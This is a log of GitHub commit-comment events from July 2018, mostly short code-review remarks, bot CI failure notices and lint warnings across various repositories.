{"id":"7936245793","type":"CommitCommentEvent","actor":{"login":"nmegrant"},"repo":{"name":"nmegrant/run_length_encoding"},"payload":{"comment":{"id":29638255,"position":7,"line":7,"path":"run_length_encoding.py","commit_id":"34ab95ea843e2842bd08a3f7a7664df7f01dd577","created_at":"2018-07-09T08:49:02Z","updated_at":"2018-07-09T08:49:02Z","author_association":"OWNER","body":"NO!"}},"created_at":"2018-07-09T08:49:02Z"}
{"id":"7936246260","type":"CommitCommentEvent","actor":{"login":"irobor"},"repo":{"name":"irobor/ICO-ERC223"},"payload":{"comment":{"id":29638258,"position":3,"line":3,"path":".gitignore/ERC223.sol","commit_id":"44843d620c1bec61b32daabb76ef25a85a4067aa","created_at":"2018-07-09T08:49:08Z","updated_at":"2018-07-09T08:49:08Z","author_association":"OWNER","body":"\r\n\r\n[;]["}},"created_at":"2018-07-09T08:49:08Z"}
{"id":"7936246892","type":"CommitCommentEvent","actor":{"login":"chrmarti"},"repo":{"name":"Microsoft/vscode"},"payload":{"comment":{"id":29638259,"position":5,"line":535,"path":"src/vs/vscode.proposed.d.ts","commit_id":"287f911a58ee033d5b6cb4e010156c2ab6dc9f7f","created_at":"2018-07-09T08:49:15Z","updated_at":"2018-07-09T08:49:15Z","author_association":"CONTRIBUTOR","body":"Thanks!"}},"created_at":"2018-07-09T08:49:15Z"}
{"id":"7936247953","type":"CommitCommentEvent","actor":{"login":"DaddyCal"},"repo":{"name":"DaddyCal/CocoaPods"},"payload":{"comment":{"id":29638260,"position":19,"line":66,"path":"lib/cocoapods/installer/xcode/pods_project_generator.rb","commit_id":"a06317eb8e72c9e7cd3a4ef651cde1ecfaed3bbc","created_at":"2018-07-09T08:49:28Z","updated_at":"2018-07-09T08:49:28Z","author_association":"OWNER","body":"Install libraries"}},"created_at":"2018-07-09T08:49:28Z"}
{"id":"7936252199","type":"CommitCommentEvent","actor":{"login":"DaddyCal"},"repo":{"name":"DaddyCal/CocoaPods"},"payload":{"comment":{"id":29638270,"position":4,"line":7,"path":"lib/cocoapods/installer/xcode/pods_project_generator.rb","commit_id":"a06317eb8e72c9e7cd3a4ef651cde1ecfaed3bbc","created_at":"2018-07-09T08:50:20Z","updated_at":"2018-07-09T08:50:20Z","author_association":"OWNER","body":"Require"}},"created_at":"2018-07-09T08:50:20Z"}
{"id":"7936257024","type":"CommitCommentEvent","actor":{"login":"gdelhumeau"},"repo":{"name":"xwiki/xwiki-platform"},"payload":{"comment":{"id":29638275,"position":8,"line":298,"path":"xwiki-platform-core/xwiki-platform-notifications/xwiki-platform-notifications-ui/src/main/resources/XWiki/Notifications/Code/NotificationsMacro.xml","commit_id":"cc4eadd4e9ea1c369a912bf0c80e440e183b6d20","created_at":"2018-07-09T08:51:16Z","updated_at":"2018-07-09T08:51:16Z","author_association":"MEMBER","body":"I took inspiration from https://jira.xwiki.org/browse/XWIKI-12981 where we added the version of the resource in the URL.\r\nIt's a common trick to be sure no browser will cache the result.\r\nNow, I've found https://stackoverflow.com/questions/1234246/random-querystring-to-avoid-ie-caching which suggest to use a \"cache: false\" parameter to the AJAX call performed with jQuery. That could be an other solution."}},"created_at":"2018-07-09T08:51:16Z"}
{"id":"7936257533","type":"CommitCommentEvent","actor":{"login":"sidelux"},"repo":{"name":"Seems2Legit/Rainbow-Six-Siege-Player-Stats-API"},"payload":{"comment":{"id":29638278,"position":null,"line":null,"path":null,"commit_id":"b080fd8571e40e6b6eda70353d5a8806df7c6eba","created_at":"2018-07-09T08:51:22Z","updated_at":"2018-07-09T08:51:22Z","author_association":"NONE","body":"With 777 all users that write complete path in address bar can see ticket content, i do not recommend this approach..."}},"created_at":"2018-07-09T08:51:22Z"}
{"id":"7936261198","type":"CommitCommentEvent","actor":{"login":"ceball"},"repo":{"name":"pyviz/nbsite"},"payload":{"comment":{"id":29638283,"position":null,"line":null,"path":null,"commit_id":"2b1eb7f5d983a491aad575c6f0afe6aadf34ad98","created_at":"2018-07-09T08:52:05Z","updated_at":"2018-07-09T08:52:05Z","author_association":"CONTRIBUTOR","body":"I've made #60. Is that what this change was meant to be?"}},"created_at":"2018-07-09T08:52:05Z"}
{"id":"7936263352","type":"CommitCommentEvent","actor":{"login":"thomasmari"},"repo":{"name":"thomasmari/CZK_project"},"payload":{"comment":{"id":29638287,"position":null,"line":null,"path":null,"commit_id":"de4c0fe658d53c973d36e30f55ee03b6f3ba060f","created_at":"2018-07-09T08:52:30Z","updated_at":"2018-07-09T08:52:30Z","author_association":"OWNER","body":"In the last model we could use only one trigger because the timeout were the same and they weren't enabled at the same time. In this model the timeouts aren't enabled at the same time but the timeout are different. Putting more trigger doesn't increase the number of reacheable state (but increase exponentially the number of states),  when one trigger is non-zero the others are zeros. I believe it still slow down the computa"}},"created_at":"2018-07-09T08:52:30Z"}
{"id":"7936265296","type":"CommitCommentEvent","actor":{"login":"hiwaamiri"},"repo":{"name":"hiwaamiri/Programming"},"payload":{"comment":{"id":29638289,"position":1,"line":1,"path":"_folder","commit_id":"853334804bef102bd19148d510bac23fa184ebd2","created_at":"2018-07-09T08:52:53Z","updated_at":"2018-07-09T08:52:53Z","author_association":"OWNER","body":"test"}},"created_at":"2018-07-09T08:52:53Z"}
{"id":"7936267001","type":"CommitCommentEvent","actor":{"login":"AsukaThea"},"repo":{"name":"F-loat/ithome-lite"},"payload":{"comment":{"id":29638293,"position":null,"line":null,"path":null,"commit_id":"9137744e25000cbaa82529639976b3ddea3b5f1b","created_at":"2018-07-09T08:53:13Z","updated_at":"2018-07-09T08:53:13Z","author_association":"NONE","body":"你这个就是用了代码编辑器优化，text文件之类的还是存在啊，mode属性也在啊，能兼容web端？？？    你这个代码怎么在浏览器上跑"}},"created_at":"2018-07-09T08:53:13Z"}
{"id":"7936268302","type":"CommitCommentEvent","actor":{"login":"vintproykt"},"repo":{"name":"VoquGen/VoquGen"},"payload":{"comment":{"id":29638294,"position":34,"line":18,"path":"package.json","commit_id":"ff01bbf681712e3e7c7a236b172e84ca8b7ed286","created_at":"2018-07-09T08:53:28Z","updated_at":"2018-07-09T08:53:28Z","author_association":"CONTRIBUTOR","body":"I called it \"export.config.js\" instead of \"forge.config.js\" to remove confusion with Minecraft Forge Mod.\r\n`electron-forge` is not related to Minecraft, but it is up to build process of VoquGen."}},"created_at":"2018-07-09T08:53:28Z"}
{"id":"7936270211","type":"CommitCommentEvent","actor":{"login":"valkuc"},"repo":{"name":"espressif/ESP8266_NONOS_SDK"},"payload":{"comment":{"id":29638299,"position":null,"line":null,"path":null,"commit_id":"c76613457be934856bc3bcfce7117eb00300e020","created_at":"2018-07-09T08:53:49Z","updated_at":"2018-07-09T08:53:49Z","author_association":"NONE","body":"Could you please explain difference between os_malloc and os_malloc_dram and when each of them can used? Will this change be reflected in NON OS SDK document?"}},"created_at":"2018-07-09T08:53:49Z"}
{"id":"7936271391","type":"CommitCommentEvent","actor":{"login":"hiwaamiri"},"repo":{"name":"hiwaamiri/Programming"},"payload":{"comment":{"id":29638304,"position":1,"line":1,"path":"_folder","commit_id":"853334804bef102bd19148d510bac23fa184ebd2","created_at":"2018-07-09T08:54:04Z","updated_at":"2018-07-09T08:54:04Z","author_association":"OWNER","body":"test"}},"created_at":"2018-07-09T08:54:04Z"}
{"id":"7936271416","type":"CommitCommentEvent","actor":{"login":"DaddyCal"},"repo":{"name":"DaddyCal/CocoaPods"},"payload":{"comment":{"id":29638305,"position":4,"line":7,"path":"lib/cocoapods/installer/xcode/pods_project_generator.rb","commit_id":"a06317eb8e72c9e7cd3a4ef651cde1ecfaed3bbc","created_at":"2018-07-09T08:54:04Z","updated_at":"2018-07-09T08:54:04Z","author_association":"OWNER","body":"git@github.com:DaddyCal/CocoaPods.git### \r\n\r\n> [`_****_`](git@github.com:DaddyCal/CocoaPods.git)"}},"created_at":"2018-07-09T08:54:04Z"}
{"id":"7936272908","type":"CommitCommentEvent","actor":{"login":"F-loat"},"repo":{"name":"F-loat/ithome-lite"},"payload":{"comment":{"id":29638307,"position":null,"line":null,"path":null,"commit_id":"9137744e25000cbaa82529639976b3ddea3b5f1b","created_at":"2018-07-09T08:54:21Z","updated_at":"2018-07-09T08:54:21Z","author_association":"OWNER","body":"@AsukaThea https://github.com/F-loat/ithome-lite/tree/web-version"}},"created_at":"2018-07-09T08:54:21Z"}
{"id":"7936274065","type":"CommitCommentEvent","actor":{"login":"vermorel"},"repo":{"name":"Lokad/Adrien"},"payload":{"comment":{"id":29638308,"position":9,"line":9,"path":"src/spikes/2/Adrien.Base/GenericMath.cs","commit_id":"bd5f63b98634b20352f0a9f6e3c0f0443155d0f5","created_at":"2018-07-09T08:54:34Z","updated_at":"2018-07-09T08:54:34Z","author_association":"MEMBER","body":"That's a weird term `Cunmanagedor` :-) I I would suggest to remove this `#region`."}},"created_at":"2018-07-09T08:54:34Z"}
{"id":"7936278407","type":"CommitCommentEvent","actor":{"login":"marsonmao"},"repo":{"name":"facebook/react-native"},"payload":{"comment":{"id":29638317,"position":null,"line":null,"path":null,"commit_id":"65184ec6b0ef2d136c0db239d65e0624efac8a2d","created_at":"2018-07-09T08:55:24Z","updated_at":"2018-07-09T08:55:24Z","author_association":"NONE","body":"Looking forward to the android version!!"}},"created_at":"2018-07-09T08:55:24Z"}
{"id":"7936279831","type":"CommitCommentEvent","actor":{"login":"thomasmari"},"repo":{"name":"thomasmari/CZK_project"},"payload":{"comment":{"id":29638319,"position":null,"line":null,"path":null,"commit_id":"de4c0fe658d53c973d36e30f55ee03b6f3ba060f","created_at":"2018-07-09T08:55:41Z","updated_at":"2018-07-09T08:55:41Z","author_association":"OWNER","body":"tion. I'll try your method (the email) to see if it's better (i think it is).\r\nMy laptop works fine now. But the HDD is dead i had to replace it and i can't recover the data yet because the engine of the HDD is not running. I think it's corrosion :("}},"created_at":"2018-07-09T08:55:41Z"}
{"id":"7936281798","type":"CommitCommentEvent","actor":{"login":"vmassol"},"repo":{"name":"xwiki/xwiki-platform"},"payload":{"comment":{"id":29638322,"position":8,"line":298,"path":"xwiki-platform-core/xwiki-platform-notifications/xwiki-platform-notifications-ui/src/main/resources/XWiki/Notifications/Code/NotificationsMacro.xml","commit_id":"cc4eadd4e9ea1c369a912bf0c80e440e183b6d20","created_at":"2018-07-09T08:56:04Z","updated_at":"2018-07-09T08:56:04Z","author_association":"MEMBER","body":"It depends the behavior you wish to have. The trick to use a parameter that matches the version of the resource is when you want the browser to cache the result and to discard the cache when the resource changes. If you always want to have the browser cache the value then the response header is the right way.\r\n\r\nI don't know in which case you are here."}},"created_at":"2018-07-09T08:56:04Z"}
{"id":"7936282025","type":"CommitCommentEvent","actor":{"login":"DaddyCal"},"repo":{"name":"DaddyCal/CocoaPods"},"payload":{"comment":{"id":29638323,"position":4,"line":7,"path":"lib/cocoapods/installer/xcode/pods_project_generator.rb","commit_id":"a06317eb8e72c9e7cd3a4ef651cde1ecfaed3bbc","created_at":"2018-07-09T08:56:07Z","updated_at":"2018-07-09T08:56:07Z","author_association":"OWNER","body":"Require"}},"created_at":"2018-07-09T08:56:07Z"}
{"id":"7936282589","type":"CommitCommentEvent","actor":{"login":"vermorel"},"repo":{"name":"Lokad/Adrien"},"payload":{"comment":{"id":29638324,"position":17,"line":17,"path":"src/spikes/2/Adrien.Base/GenericMath.cs","commit_id":"bd5f63b98634b20352f0a9f6e3c0f0443155d0f5","created_at":"2018-07-09T08:56:13Z","updated_at":"2018-07-09T08:56:13Z","author_association":"MEMBER","body":"The class `Random` is [not thread-safe](https://stackoverflow.com/questions/3049467/is-c-sharp-random-number-generator-thread-safe), so it's typically not a good idea to use it as a static variable."}},"created_at":"2018-07-09T08:56:13Z"}
{"id":"7936282725","type":"CommitCommentEvent","actor":{"login":"antoineco"},"repo":{"name":"floragunncom/search-guard"},"payload":{"comment":{"id":29638325,"position":40,"line":31,"path":"sgconfig/sg_internal_users.yml","commit_id":"cd1c5cc3fb0edcabbcd3cab6001c376e4a9e78b2","created_at":"2018-07-09T08:56:14Z","updated_at":"2018-07-09T08:56:14Z","author_association":"NONE","body":"Duplicate line (not worth a PR 🙂)"}},"created_at":"2018-07-09T08:56:14Z"}
{"id":"7936284026","type":"CommitCommentEvent","actor":{"login":"DaddyCal"},"repo":{"name":"DaddyCal/CocoaPods"},"payload":{"comment":{"id":29638326,"position":11,"line":14,"path":"lib/cocoapods/installer/xcode/pods_project_generator.rb","commit_id":"a06317eb8e72c9e7cd3a4ef651cde1ecfaed3bbc","created_at":"2018-07-09T08:56:28Z","updated_at":"2018-07-09T08:56:28Z","author_association":"OWNER","body":"Require"}},"created_at":"2018-07-09T08:56:28Z"}
{"id":"7936287085","type":"CommitCommentEvent","actor":{"login":"Aditya2202"},"repo":{"name":"Aditya2202/Naive-Bayesian-Spam-filter"},"payload":{"comment":{"id":29638334,"position":null,"line":null,"path":null,"commit_id":"3bd3571fcdc4a64f5a5302b7578265ed8385d901","created_at":"2018-07-09T08:57:03Z","updated_at":"2018-07-09T08:57:03Z","author_association":"OWNER","body":"# Spam-or-Ham\r\nDataset: The dataset used for this project is UCI SMS spam collection dataset. \r\n     \r\n     Link: https://www.kaggle.com/uciml/sms-spam-collection-dataset/\r\n          \r\n\r\n"}},"created_at":"2018-07-09T08:57:03Z"}
{"id":"7936288802","type":"CommitCommentEvent","actor":{"login":"noobpwnftw"},"repo":{"name":"vondele/Stockfish"},"payload":{"comment":{"id":29638336,"position":null,"line":null,"path":null,"commit_id":"fbbc57c77902059c82393feb6ad5cb431666490e","created_at":"2018-07-09T08:57:22Z","updated_at":"2018-07-09T08:57:22Z","author_association":"NONE","body":"It is probably due to cutechess-cli cannot handle 12 games running concurrently.\r\nhttp://tests.stockfishchess.org/tests/view/5b40d2e80ebc5902b9000e94\r\nThis test was at very short TC had only one timeout, and the machine is running nothing else.\r\n\r\nSo maybe you can increase move overhead or run the tests with more threads per engine."}},"created_at":"2018-07-09T08:57:22Z"}
{"id":"7936289910","type":"CommitCommentEvent","actor":{"login":"poggit-bot"},"repo":{"name":"benzodoesdev/ShellyEssentials-"},"payload":{"comment":{"id":29638337,"position":null,"line":null,"path":null,"commit_id":"ff946a6c7b6e1d099247c122d4b7deff93c07bf5","created_at":"2018-07-09T08:57:34Z","updated_at":"2018-07-09T08:57:34Z","author_association":"NONE","body":"Dear Poggit user,\n\nThis is an automatic message from Poggit-CI. Poggit-CI was triggered by this commit, but failed to create builds due to the following error:\n\n```\n.poggit.yml does not contain the projects attribute or has an invalid\nformat\n```\n\nAs a result, no builds could be created from this commit. More details might be available for repo admins at [the webhook delivery response log](https://github.com/benzodoesdev/ShellyEssentials-/settings/hooks) &mdash; see the webhook starting with `https://poggit.pmmp.io/webhooks.gh.repo` and look for the delivery with ID `1e3fcd70-8356-11e8-902d-34e83405c93c`.\n\nShall you need any assistance, you may contact us on [on Discord](https://discord.gg/NgHf9jt), or more publicly, [on GitHub](https://github.com/poggit/support/issues). Commenting on this commit directly will **not** notify any Poggit staff.\n\nRegards,\nPoggit Bot (@poggit-bot)\nThe official Poggit automation account"}},"created_at":"2018-07-09T08:57:34Z"}
{"id":"7936294118","type":"CommitCommentEvent","actor":{"login":"vermorel"},"repo":{"name":"Lokad/Adrien"},"payload":{"comment":{"id":29638343,"position":27,"line":27,"path":"src/spikes/2/Adrien.Base/GenericMath.cs","commit_id":"bd5f63b98634b20352f0a9f6e3c0f0443155d0f5","created_at":"2018-07-09T08:58:21Z","updated_at":"2018-07-09T08:58:21Z","author_association":"MEMBER","body":"All the code below is rather verbose. I am wondering if it would not be a a case for  some templating logic that iterates over a list of predefined numeric types."}},"created_at":"2018-07-09T08:58:21Z"}
{"id":"7936295531","type":"CommitCommentEvent","actor":{"login":"fab-girard"},"repo":{"name":"JuhBoy/mapotempo-web"},"payload":{"comment":{"id":29638346,"position":4,"line":37,"path":"app/api/v01/devices/device_helpers.rb","commit_id":"d6911f492f5d5ab00745c546a789f27268fb7387","created_at":"2018-07-09T08:58:36Z","updated_at":"2018-07-09T08:58:36Z","author_association":"NONE","body":"add this inside `service.clear_route` and commit a unit test"}},"created_at":"2018-07-09T08:58:36Z"}
{"id":"7936296021","type":"CommitCommentEvent","actor":{"login":"fab-girard"},"repo":{"name":"JuhBoy/mapotempo-web"},"payload":{"comment":{"id":29638347,"position":12,"line":50,"path":"app/api/v01/devices/device_helpers.rb","commit_id":"d6911f492f5d5ab00745c546a789f27268fb7387","created_at":"2018-07-09T08:58:40Z","updated_at":"2018-07-09T08:58:40Z","author_association":"NONE","body":"idem"}},"created_at":"2018-07-09T08:58:40Z"}
{"id":"7936297140","type":"CommitCommentEvent","actor":{"login":"TheQwertiest"},"repo":{"name":"TheQwertiest/foo-jscript-panel"},"payload":{"comment":{"id":29638350,"position":null,"line":null,"path":null,"commit_id":"57393822ae42e1ebd77911c0f934471903975b4e","created_at":"2018-07-09T08:58:54Z","updated_at":"2018-07-09T08:58:54Z","author_association":"OWNER","body":"> You'll also need to rename the fields used by the internal stats DB\r\n\r\nIt seems this was the source of another error I was getting, thanks!"}},"created_at":"2018-07-09T08:58:54Z"}
{"id":"7936300586","type":"CommitCommentEvent","actor":{"login":"vermorel"},"repo":{"name":"Lokad/Adrien"},"payload":{"comment":{"id":29638358,"position":29,"line":29,"path":"src/spikes/2/Adrien.Base/GenericMath.cs","commit_id":"bd5f63b98634b20352f0a9f6e3c0f0443155d0f5","created_at":"2018-07-09T08:59:34Z","updated_at":"2018-07-09T08:59:34Z","author_association":"MEMBER","body":"I would suggest to use a `ValueTuple` (struct) rather than a `Tuple` (class)."}},"created_at":"2018-07-09T08:59:34Z"}
{"id":"7936301802","type":"CommitCommentEvent","actor":{"login":"noobpwnftw"},"repo":{"name":"vondele/Stockfish"},"payload":{"comment":{"id":29638361,"position":null,"line":null,"path":null,"commit_id":"fbbc57c77902059c82393feb6ad5cb431666490e","created_at":"2018-07-09T08:59:49Z","updated_at":"2018-07-09T08:59:49Z","author_association":"NONE","body":"Also I have noticed that http://tests.stockfishchess.org/tests/view/5b41a6e20ebc5902b9001d96 had no timeouts from me but a lot from other worker, I'm not quite sure what might be the cause."}},"created_at":"2018-07-09T08:59:49Z"}
{"id":"7936303895","type":"CommitCommentEvent","actor":{"login":"aljoscha"},"repo":{"name":"apache/flink"},"payload":{"comment":{"id":29638369,"position":null,"line":null,"path":null,"commit_id":"8c89f3c6b5ebd0334176d9e7e57b38b4d39a594a","created_at":"2018-07-09T09:00:13Z","updated_at":"2018-07-09T09:00:13Z","author_association":"CONTRIBUTOR","body":"Strange, it seems to be this one: https://issues.apache.org/jira/browse/FLINK-5363"}},"created_at":"2018-07-09T09:00:13Z"}
{"id":"7936305813","type":"CommitCommentEvent","actor":{"login":"jmccrae"},"repo":{"name":"globalwordnet/schemas"},"payload":{"comment":{"id":29638377,"position":null,"line":null,"path":null,"commit_id":"c491180ffebc31af7889d8e7dc39fb8d6949457b","created_at":"2018-07-09T09:00:31Z","updated_at":"2018-07-09T09:00:31Z","author_association":"CONTRIBUTOR","body":"Hi Luis, \r\n\r\nit is already merged into gh-pages so it is live. I have updated master as well."}},"created_at":"2018-07-09T09:00:31Z"}
{"id":"7936307807","type":"CommitCommentEvent","actor":{"login":"samiahmedsiddiqui"},"repo":{"name":"yasglobal/permalinks-customizer"},"payload":{"comment":{"id":29638380,"position":null,"line":null,"path":null,"commit_id":"bdc0ce9daaff880f54be26a1f6e8dabeb326b230","created_at":"2018-07-09T09:00:53Z","updated_at":"2018-07-09T09:00:53Z","author_association":"MEMBER","body":"Added Validation Error on **Regenerate Permalink** in Bulk for Post Types if the Permalink Structure for that post types doesn't be found in Plugin Settings and Permalink Settings of WordPress are set to plain. Also, updated Taxonomy Validation Error."}},"created_at":"2018-07-09T09:00:53Z"}
{"id":"7936308296","type":"CommitCommentEvent","actor":{"login":"yangqun0121"},"repo":{"name":"yangqun0121/Hello_world"},"payload":{"comment":{"id":29638381,"position":null,"line":null,"path":null,"commit_id":"a222e0a13b71c1fd9d0c49708beeea0fd1ae7a8a","created_at":"2018-07-09T09:00:59Z","updated_at":"2018-07-09T09:00:59Z","author_association":"OWNER","body":"加了一句话"}},"created_at":"2018-07-09T09:00:59Z"}
{"id":"7936308979","type":"CommitCommentEvent","actor":{"login":"vermorel"},"repo":{"name":"Lokad/Adrien"},"payload":{"comment":{"id":29638383,"position":133,"line":133,"path":"src/spikes/2/Adrien.Base/GenericMath.cs","commit_id":"bd5f63b98634b20352f0a9f6e3c0f0443155d0f5","created_at":"2018-07-09T09:01:07Z","updated_at":"2018-07-09T09:01:07Z","author_association":"MEMBER","body":"I would suggest to pass the random generator as argument here."}},"created_at":"2018-07-09T09:01:07Z"}
{"id":"7936309517","type":"CommitCommentEvent","actor":{"login":"TatianaKobets"},"repo":{"name":"TatianaKobets/tatianakobets.github.io"},"payload":{"comment":{"id":29638384,"position":null,"line":null,"path":null,"commit_id":"1724356b39ef1878819d86b28dcbef5f740aacd9","created_at":"2018-07-09T09:01:12Z","updated_at":"2018-07-09T09:01:12Z","author_association":"OWNER","body":"Загрузка"}},"created_at":"2018-07-09T09:01:12Z"}
{"id":"7936312852","type":"CommitCommentEvent","actor":{"login":"balloob"},"repo":{"name":"home-assistant/home-assistant"},"payload":{"comment":{"id":29638391,"position":null,"line":null,"path":null,"commit_id":"34392db9e4eadb3ae31e5c7ca3542cb0291a02ad","created_at":"2018-07-09T09:01:51Z","updated_at":"2018-07-09T09:01:51Z","author_association":"MEMBER","body":"Members are allowed to work in the main hass repo. Forks on GitHub always get outdated."}},"created_at":"2018-07-09T09:01:51Z"}
{"id":"7936316797","type":"CommitCommentEvent","actor":{"login":"vermorel"},"repo":{"name":"Lokad/Adrien"},"payload":{"comment":{"id":29638398,"position":62,"line":62,"path":"src/spikes/2/Adrien.Base/GenericMath.cs","commit_id":"bd5f63b98634b20352f0a9f6e3c0f0443155d0f5","created_at":"2018-07-09T09:02:36Z","updated_at":"2018-07-09T09:02:36Z","author_association":"MEMBER","body":"Do you really have a use-case to support `bool` here? For half of the methods, the `bool` case is an edge-case. I would rather suggest to remove `bool` altogether from the present logic."}},"created_at":"2018-07-09T09:02:36Z"}
{"id":"7936318575","type":"CommitCommentEvent","actor":{"login":"DaddyCal"},"repo":{"name":"DaddyCal/CocoaPods"},"payload":{"comment":{"id":29638408,"position":7,"line":49,"path":"lib/cocoapods/installer/xcode/pods_project_generator/pod_target_installer.rb","commit_id":"a06317eb8e72c9e7cd3a4ef651cde1ecfaed3bbc","created_at":"2018-07-09T09:02:56Z","updated_at":"2018-07-09T09:02:56Z","author_association":"OWNER","body":"+ add_files_to_build_phases(native_target, test_native_targets)"}},"created_at":"2018-07-09T09:02:56Z"}
{"id":"7936319992","type":"CommitCommentEvent","actor":{"login":"poggit-bot"},"repo":{"name":"benzodoesdev/ShellyEssentials-"},"payload":{"comment":{"id":29638414,"position":null,"line":null,"path":null,"commit_id":"9bff6728df202f6d00830c8ec1f9f097ac028658","created_at":"2018-07-09T09:03:13Z","updated_at":"2018-07-09T09:03:13Z","author_association":"NONE","body":"Dear Poggit user,\n\nThis is an automatic message from Poggit-CI. Poggit-CI was triggered by this commit, but failed to create builds due to the following error:\n\n```\n.poggit.yml does not contain the projects attribute or has an invalid\nformat\n```\n\nAs a result, no builds could be created from this commit. More details might be available for repo admins at [the webhook delivery response log](https://github.com/benzodoesdev/ShellyEssentials-/settings/hooks) &mdash; see the webhook starting with `https://poggit.pmmp.io/webhooks.gh.repo` and look for the delivery with ID `e80e13be-8356-11e8-8483-ce81eccbc49f`.\n\nShall you need any assistance, you may contact us on [on Discord](https://discord.gg/NgHf9jt), or more publicly, [on GitHub](https://github.com/poggit/support/issues). Commenting on this commit directly will **not** notify any Poggit staff.\n\nRegards,\nPoggit Bot (@poggit-bot)\nThe official Poggit automation account"}},"created_at":"2018-07-09T09:03:13Z"}
{"id":"7936321721","type":"CommitCommentEvent","actor":{"login":"18981581640"},"repo":{"name":"18981581640/jtbanzhuan"},"payload":{"comment":{"id":29638419,"position":null,"line":null,"path":null,"commit_id":"659a8d8053da1ad39f2181b5c0adc0ab31968861","created_at":"2018-07-09T09:03:33Z","updated_at":"2018-07-09T09:03:33Z","author_association":"OWNER","body":"qqqqqqqqqqq"}},"created_at":"2018-07-09T09:03:33Z"}
{"id":"7936322541","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"zerocracy/farm"},"payload":{"comment":{"id":29638421,"position":null,"line":null,"path":null,"commit_id":"5df7bbac098bc8ac702e4f046e4afc3bba77d381","created_at":"2018-07-09T09:03:43Z","updated_at":"2018-07-09T09:03:43Z","author_association":"COLLABORATOR","body":"Puzzle `1037-a0e84825` discovered in   [`src/test/java/com/zerocracy/XocumentTest.java`](  https://github.com/zerocracy/farm/blob/master/src/test/java/com/zerocracy/XocumentTest.java)   and submitted as #1385. Please, remember that the puzzle was not   necessarily added in this particular commit. Maybe it was added earlier, but   we discovered it only now."}},"created_at":"2018-07-09T09:03:43Z"}
{"id":"7936326426","type":"CommitCommentEvent","actor":{"login":"lmorgadodacosta"},"repo":{"name":"globalwordnet/schemas"},"payload":{"comment":{"id":29638426,"position":null,"line":null,"path":null,"commit_id":"c491180ffebc31af7889d8e7dc39fb8d6949457b","created_at":"2018-07-09T09:04:28Z","updated_at":"2018-07-09T09:04:28Z","author_association":"NONE","body":"Thanks!"}},"created_at":"2018-07-09T09:04:28Z"}
{"id":"7936327449","type":"CommitCommentEvent","actor":{"login":"dalikim"},"repo":{"name":"parti-xyz/govcraft"},"payload":{"comment":{"id":29638427,"position":null,"line":null,"path":null,"commit_id":"57a224effff132fcf426a288a164ded9d872bccd","created_at":"2018-07-09T09:04:40Z","updated_at":"2018-07-09T09:04:40Z","author_association":"CONTRIBUTOR","body":"찬성인지는 agreed?라는 메소드가 있습니다"}},"created_at":"2018-07-09T09:04:40Z"}
{"id":"7936328598","type":"CommitCommentEvent","actor":{"login":"capricorn2001"},"repo":{"name":"vantu5z/RHVoice-dictionary"},"payload":{"comment":{"id":29638428,"position":null,"line":null,"path":null,"commit_id":"f2f0f86e18192a0eff7326649dba7c2f2fc328f3","created_at":"2018-07-09T09:04:54Z","updated_at":"2018-07-09T09:04:54Z","author_association":"COLLABORATOR","body":"Надо еще разбираться с поколениями, сто- и тысячелетиями.\r\n"}},"created_at":"2018-07-09T09:04:54Z"}
{"id":"7936329993","type":"CommitCommentEvent","actor":{"login":"torkelo"},"repo":{"name":"grafana/grafana"},"payload":{"comment":{"id":29638432,"position":74,"line":74,"path":"public/app/containers/Explore/Explore.tsx","commit_id":"f1220fd2a4d46eacf9b28b3e5b4b1d91b9615856","created_at":"2018-07-09T09:05:10Z","updated_at":"2018-07-09T09:05:10Z","author_association":"MEMBER","body":"I can't find this being used anywhere.  (it's used on props, but this instance prop is not)"}},"created_at":"2018-07-09T09:05:10Z"}
{"id":"7936330969","type":"CommitCommentEvent","actor":{"login":"dalikim"},"repo":{"name":"parti-xyz/govcraft"},"payload":{"comment":{"id":29638434,"position":null,"line":null,"path":null,"commit_id":"57a224effff132fcf426a288a164ded9d872bccd","created_at":"2018-07-09T09:05:21Z","updated_at":"2018-07-09T09:05:21Z","author_association":"CONTRIBUTOR","body":"찬성만 답변보는 건가요? 왜요?"}},"created_at":"2018-07-09T09:05:21Z"}
{"id":"7936341127","type":"CommitCommentEvent","actor":{"login":"nabeelomer"},"repo":{"name":"WhitespaceRed/whitespacered.github.io"},"payload":{"comment":{"id":29638519,"position":null,"line":null,"path":null,"commit_id":"7b4c504c5446d23638a065a03d1fb6aa383be903","created_at":"2018-07-09T09:07:21Z","updated_at":"2018-07-09T09:07:21Z","author_association":"MEMBER","body":"Mine was working too :unamused:"}},"created_at":"2018-07-09T09:07:21Z"}
{"id":"7936343516","type":"CommitCommentEvent","actor":{"login":"AsukaThea"},"repo":{"name":"F-loat/ithome-lite"},"payload":{"comment":{"id":29638523,"position":null,"line":null,"path":null,"commit_id":"9137744e25000cbaa82529639976b3ddea3b5f1b","created_at":"2018-07-09T09:07:49Z","updated_at":"2018-07-09T09:07:49Z","author_association":"NONE","body":"你这里面说明书没有说啊，我拉取你这个代码了，编译过了，怎么在浏览器上跑，还有就是我看你源码了，mode属性之类的还是存在的"}},"created_at":"2018-07-09T09:07:49Z"}
{"id":"7936344672","type":"CommitCommentEvent","actor":{"login":"at-dev-support-01"},"repo":{"name":"akaj-team/intern-18-summer"},"payload":{"comment":{"id":29638526,"position":4,"line":null,"path":"app/src/at-trivo/java/asiantech/internship/summer/drawer_layout/DrawerClickedListener.java","commit_id":"28f1a321afd18b72b980b4ba83a3b875bdd904cc","created_at":"2018-07-09T09:08:03Z","updated_at":"2018-07-09T09:08:03Z","author_association":"NONE","body":"ERROR: [MethodNamingConventions] Method names should not start with capital letters\nhttps://pmd.github.io/pmd-5.6.1/pmd-java/rules/java/naming.html#MethodNamingConventions"}},"created_at":"2018-07-09T09:08:03Z"}
{"id":"7936344698","type":"CommitCommentEvent","actor":{"login":"at-dev-support-01"},"repo":{"name":"akaj-team/intern-18-summer"},"payload":{"comment":{"id":29638527,"position":5,"line":null,"path":"app/src/at-trivo/java/asiantech/internship/summer/drawer_layout/DrawerClickedListener.java","commit_id":"28f1a321afd18b72b980b4ba83a3b875bdd904cc","created_at":"2018-07-09T09:08:03Z","updated_at":"2018-07-09T09:08:03Z","author_association":"NONE","body":"ERROR: [MethodNamingConventions] Method names should not start with capital letters\nhttps://pmd.github.io/pmd-5.6.1/pmd-java/rules/java/naming.html#MethodNamingConventions"}},"created_at":"2018-07-09T09:08:03Z"}
